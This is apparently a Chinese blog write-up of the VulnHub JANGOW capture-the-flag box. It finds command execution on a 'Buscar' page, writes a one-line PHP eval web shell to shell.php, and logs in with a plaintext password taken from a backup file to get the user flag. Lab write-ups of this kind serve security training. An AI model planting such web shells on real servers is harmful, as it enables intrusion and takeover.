VulnHub JANGOW

提示(主机ip分配问题)

因为直接在VulnHub上下载的盒子,在VMware上打开,默认是不分配主机的

所以我们可以在VirtualBox上打开

一、信息收集

发现开放了21和80端口,查看一下80端口

80端口:

检查页面后发现Buscar页面有个可疑的地方:

试下,有命令执行

直接写入一句话木马试一下:

echo '<?php eval($_POST["sain"]);' > shell.php

利用命令执行,看到有shell.php,说明上传成功

连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:

除此之外发现在/var/www/html下有一个./backup文件:

发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:

username = "jangow01"password = "abygurl69"

拿到了user_flag

相关推荐
shcoc几秒前
备用 申请acme 申请ssl
网络·网络协议·ssl
做人不要太理性2 分钟前
【Linux系统】ELF 文件格式的硬核揭秘
java·linux·服务器
网络小白不怕黑2 分钟前
Docker容器网络:从容器互联到跨主机通信
网络·docker·容器
m0_4711996310 分钟前
【vue】收银界面离线可用,本地缓存订单,网络恢复后同步
网络·vue.js·缓存
岁月宁静14 分钟前
🐍 Python 核心知识点:从零开始快速构建 Python 知识体系
python
老蒋新思维18 分钟前
创客匠人 2025 万人峰会实录:AI 智能体重构创始人 IP 变现逻辑 —— 从 0 到年入千万的实战路径
大数据·网络·人工智能·tcp/ip·创始人ip·创客匠人·知识变现
怀旧,28 分钟前
【Linux系统编程】12. 基础IO(下)
linux·运维·服务器
C嘎嘎嵌入式开发30 分钟前
deepseek-r1大模型的本地部署
人工智能·python·神经网络·机器学习
wyjcxyyy33 分钟前
Polar-MISC-WEB(困难)
web·ctf·misc·polar
Winter_Sun灬33 分钟前
CentOS 7 编译安卓 arm64-v8a 版 OpenSSL 动态库(.so)
android·linux·centos